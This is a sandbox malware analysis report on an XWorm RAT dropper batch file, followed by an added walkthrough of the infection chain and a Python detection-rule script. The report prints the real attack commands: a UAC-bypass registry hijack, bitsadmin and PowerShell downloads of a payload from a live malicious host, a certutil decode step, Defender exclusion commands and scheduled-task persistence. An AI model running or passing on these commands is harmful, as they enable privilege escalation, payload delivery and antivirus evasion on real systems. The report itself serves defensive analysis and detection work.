Malware Analysis Report

2024-10-16 05:07

Sample ID: 240727-2plqeasekk
Target: Uac Bypass Rat.bat
SHA256: a5414f82d063d24e7f0d7e417024ba796c6e52fcb07cd8e59c306fe0e05b7518
Tags: dropper execution xworm defense_evasion persistence rat trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: a5414f82d063d24e7f0d7e417024ba796c6e52fcb07cd8e59c306fe0e05b7518
Threat Level: Known bad

The file Uac Bypass Rat.bat was found to be: Known bad.

Malicious Activity Summary

Tags: dropper execution xworm defense_evasion persistence rat trojan

Signatures triggered across all runs:

  Detect Xworm Payload
  Xworm
  Download via BitsAdmin
  Command and Scripting Interpreter: PowerShell
  Blocklisted process makes network request
  Executes dropped EXE
  Checks computer location settings
  Drops startup file
  Deobfuscate/Decode Files or Information
  Looks up external IP address via web service
  Adds Run key to start application
  Enumerates physical storage devices
  Enumerates system info in registry
  Uses Task Scheduler COM API
  Suspicious use of SetWindowsHookEx
  Runs net.exe
  Checks processor information in registry
  Modifies registry class
  Suspicious use of AdjustPrivilegeToken
  Modifies registry key
  Suspicious behavior: EnumeratesProcesses
  Scheduled Task/Job: Scheduled Task
  Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-07-27 22:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-07-27 22:45
Reported: 2024-07-27 22:53
Platform: win7-20240708-en
Max time kernel: 14s
Max time network: 25s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Download via BitsAdmin

dropper
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\mscfile | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\mscfile\shell | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2380 wrote to memory of 1572 (x3) | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 1572 wrote to memory of 2344 (x3) | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 2380 wrote to memory of 1532 (x3) | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 2448 (x3) | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe
PID 2380 wrote to memory of 2920 (x3) | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | xworm.xyz | udp
US | 198.54.114.193:443 | xworm.xyz | tcp
US | 198.54.114.193:443 | xworm.xyz | tcp

Files

memory/2920-4-0x000007FEF63DE000-0x000007FEF63DF000-memory.dmp
memory/2920-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp
memory/2920-6-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/2920-7-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2920-8-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2920-9-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2920-10-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2920-11-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2920-12-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-07-27 22:45
Reported: 2024-07-27 22:53
Platform: win10v2004-20240709-en
Max time kernel: 148s
Max time network: 156s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

Signatures

Detect Xworm Payload

Description | Indicator | Process | Target
N/A (x2) | N/A | N/A | N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Download via BitsAdmin

dropper
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A
N/A | N/A | C:\Users\Admin\Uni.exe | N/A
N/A | N/A | C:\Users\Admin\Uni.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\certutil.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\schtasks.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A (x15) | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A (x44) | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\Uni.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\Uni.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2656 wrote to memory of 3828 (x2) | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 3828 wrote to memory of 1984 (x2) | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 2656 wrote to memory of 2040 (x2) | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2656 wrote to memory of 4624 (x2) | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe
PID 2656 wrote to memory of 724 (x2) | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2656 wrote to memory of 2292 (x2) | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 3288 (x2) | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 2292 wrote to memory of 2880 (x2) | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\Uni.exe
PID 2880 wrote to memory of 1296 (x2) | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 2732 (x2) | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 388 (x2) | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 4744 (x2) | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 3212 (x2) | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat"

C:\Windows\system32\certutil.exe

certutil -decodehex temp.hex "Uni.exe"

C:\Users\Admin\AppData\Local\Temp\Uni.exe

Uni.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe
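Read together, the two process lists give the whole chain. behavioral1 (Windows 7, 14s) stops after the second-stage download; behavioral2 (Windows 10) carries it through. `net session` is the batch file's elevation check (it fails unless the shell is already running as administrator). The `reg add` writes the `mscfile` open handler under HKCU\Software\Classes, which the shell consults ahead of HKLM when an auto-elevating Microsoft binary opens an .msc file (eventvwr.exe is the well-known trigger), so on a build that has not mitigated the technique the attacker's cmd.exe is launched at high integrity; the command string deletes the key again once it has run, and the trace never shows the elevating binary being started, so the bypass is staged here but its trigger is not captured. bitsadmin and Invoke-WebRequest are two independent downloaders for the same $sxr-test.bat, which rebuilds Uni.exe from temp.hex with `certutil -decodehex`; Uni.exe (XWorm) then excludes itself from Defender, registers a scheduled task that fires every minute at the highest run level, and adds a Run key and a Startup folder .lnk. The "Suspicious use of WriteProcessMemory" rows are parent-to-child writes at process creation time: read them as the process tree, not as code injection.

The following is an added example, not part of the sandbox report and not code from the sample's author: detection logic that scores this chain from process-creation records. It parses the Processes layout used above (image path line, then command line), applies a small rule set whose ATT&CK mapping is mine, and checks a few constructed benign command lines to show the rules do not fire on ordinary `schtasks`, `reg add` or Defender queries.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str      # full path of the created process
    cmdline: str    # its command line


@dataclass(frozen=True)
class Rule:
    attack: str     # ATT&CK technique ID (mapping chosen for this example)
    name: str
    image: str      # regex applied to the image path
    cmdline: str    # regex applied to the command line


RULES = (
    Rule("T1548.002", "UAC bypass staging: HKCU mscfile handler hijack",
         r"(?:^|\\)reg\.exe$",
         r"\badd\s+HK(?:CU|EY_CURRENT_USER)\\Software\\Classes\\mscfile\\shell\\open\\command\b"),
    Rule("T1197", "Ingress tool transfer via bitsadmin /transfer",
         r"(?:^|\\)bitsadmin\.exe$", r"/transfer\b.*\bhttps?://"),
    Rule("T1059.001", "PowerShell download cradle",
         r"(?:^|\\)(?:powershell|pwsh)\.exe$",
         r"\b(?:Invoke-WebRequest|iwr|Start-BitsTransfer|DownloadFile|DownloadString)\b"),
    Rule("T1140", "certutil used to decode a dropped payload",
         r"(?:^|\\)certutil\.exe$", r"\s-(?:decodehex|decode|urlcache)\b"),
    Rule("T1562.001", "Defender exclusion added with Add-MpPreference",
         r"(?:^|\\)(?:powershell|pwsh)\.exe$",
         r"\bAdd-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b"),
    Rule("T1053.005", "Scheduled task: every minute at /RL HIGHEST",
         r"(?:^|\\)schtasks\.exe$",
         r"/create\b(?=.*/RL\s+HIGHEST\b)(?=.*/sc\s+minute\b)"),
)

# Image/command-line pairs copied from the behavioral2 Processes list above (subset).
REPORT_PROCESSES = r"""
C:\Windows\system32\net.exe
net session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"
C:\Windows\system32\certutil.exe
certutil -decodehex temp.hex "Uni.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Uni.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"
"""

# Constructed benign control events (not from the report): the rules must stay quiet here.
BENIGN_EVENTS = [
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /sc daily /st 02:00 /tn "NightlyBackup" /tr "C:\Tools\backup.exe"'),
    ProcEvent(r"C:\Windows\system32\reg.exe",
              r"reg add HKCU\Software\Contoso\Editor /v Theme /d dark /f"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -Command Get-MpPreference"),
]


def parse_process_list(text: str) -> list[ProcEvent]:
    """Read the report's Processes layout: an image path line followed by its command line."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    return [ProcEvent(lines[i], lines[i + 1]) for i in range(0, len(lines) - 1, 2)]


def match_rules(ev: ProcEvent) -> list[Rule]:
    return [r for r in RULES
            if re.search(r.image, ev.image, re.I) and re.search(r.cmdline, ev.cmdline, re.I)]


def techniques_seen(events) -> dict[str, str]:
    """Distinct techniques observed on one host, technique ID -> rule name."""
    seen: dict[str, str] = {}
    for ev in events:
        for r in match_rules(ev):
            seen.setdefault(r.attack, r.name)
    return seen


URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


def download_urls(events) -> set[str]:
    """Stage-2 URLs pulled from downloader command lines (the block point for the proxy)."""
    return {u for ev in events for u in URL_RE.findall(ev.cmdline)}


if __name__ == "__main__":
    events = parse_process_list(REPORT_PROCESSES)
    for tid, name in techniques_seen(events).items():
        print(tid, name)
    print("stage-2 URLs:", download_urls(events))
```

The rules match on the command line, not on the parent, so they also fire when the same steps are run by hand or from a different loader; the scheduled-task rule deliberately requires both the one-minute trigger and /RL HIGHEST, since either alone is common in legitimate software.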

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp
US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp
US | 8.8.8.8:53 | xworm.xyz | udp
US | 198.54.114.193:443 | xworm.xyz | tcp
US | 8.8.8.8:53 | 193.114.54.198.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp
US | 198.54.114.193:443 | xworm.xyz | tcp
US | 8.8.8.8:53 | ip-api.com | udp
US | 208.95.112.1:80 | ip-api.com | tcp
US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp
US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | las-protected.gl.at.ply.gg | udp
US | 147.185.221.18:59571 | las-protected.gl.at.ply.gg | tcp
US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp
US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp
US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp
US | 147.185.221.18:59571 | las-protected.gl.at.ply.gg | tcp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp

Files

memory/724-0-0x00007FF895583000-0x00007FF895585000-memory.dmp

memory/724-2-0x0000027147EF0000-0x0000027147F12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fupjkccl.aq4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/724-11-0x00007FF895580000-0x00007FF896041000-memory.dmp

memory/724-12-0x00007FF895580000-0x00007FF896041000-memory.dmp

memory/724-16-0x00007FF895580000-0x00007FF896041000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat

MD5 011e90b162cf67f34f91d6d563859817
SHA1 30ce18995be9545ae88189bc3ff5defbd2392d11
SHA256 6cced62e6af36a52c48fdf0efb1571a44d6469f4ca66ca510020e5da407ed613
SHA512 51d47a852b27540154c8b3ccb295dae4874475bf631be931bf8a4cf271805e927162c7f01e8df7f0aea8b9a860dac3500e59208cb60440bfa8e827325be7a36d

C:\Users\Admin\AppData\Local\Temp\temp.hex

MD5 fad3aaf3015914e834a9d0313fcd371b
SHA1 a4715a153a79263436819905b87b54acae4b2227
SHA256 917674ca36b5345dccd41f4ce772c6ffe8c3054520ebd2923fba768cbee77690
SHA512 64c9bd116ad70abf9e8bf444f248915383d4b4680de1f6dadad649e0279803c9575952b0e1995a34e47c5a73eb42e23e964437a4a7828d3214f3f694383db83a

C:\Users\Admin\AppData\Local\Temp\Uni.exe

MD5 09e870076cfaa16f20be5050834ba8ff
SHA1 0b8b26cdaf08a07b8e86b1643ca23e249c8f3840
SHA256 f3fcb094f57ddd9e4c29eccc62e3ad3ce50d40230fbe0f00324ccf18acd68bc4
SHA512 d655030bf9bb84ecdd7109aab55c33976e2a2cbd63ccece48d3e881b1dd378e4e17f157a3dd9a07e8786650cbf46b8d742a115cb9906c9b69d7143c2b4de0643

memory/2880-24-0x0000000000FB0000-0x0000000000FC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7c1431cd87a8177c0b790888c1b6efa8
SHA1 fb67e6753ce01fa6f2fd782c48a0ed8da395b056
SHA256 9dec36ec39ac64e0cd97dc33f58b6b00875f113d7f07ab06636f628bd8f10616
SHA512 20ee122f42320291b3877d98ca7441fea9521d51d3bd63147d35f9208d8014cadb0c99114936ace30b8132946c08946d42e442e4797ceaf3c20e9fae35a92ca7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3f225baf35f32e8fc3bd651eb5eb13dc
SHA1 86dcbfc1f192a1f3c53eee82afb76d6fc0c70ff6
SHA256 e921b097db1d86abf03e6fe09eeb4934e7d11aa830e00947892530ff4f92441e
SHA512 e85946d77eb0eee6040416f6756f75a5a7c602a062fec547f376df0a24b2957883314966e3ecc7cf5f47fda80b375e0816e0294e1e3c44036d90274b6cf3d4d4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e69c5554cfe965e000e33ee9f1cd88d5
SHA1 ef74e8e9a0113870c87ece51d4e86040b1eeecdc
SHA256 712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0
SHA512 6a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c1b0a9f26c3e1786191e94e419f1fbf9
SHA1 7f3492f4ec2d93e164f43fe2606b53edcffd8926
SHA256 796649641966f606d7217bb94c5c0a6194eef518815dacc86feacdd78d3c1113
SHA512 fa0290d77372c26a2f14cb9b0002c222bc757ce7ad02516b884c59a1108f42eb4c76884f9edb6c7149f7c3fac917eda99b72a3b1d72b7e118a1d5a73cadd15a8

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/2880-93-0x0000000001780000-0x000000000178C000-memory.dmp

memory/2880-94-0x000000001E570000-0x000000001EA98000-memory.dmp
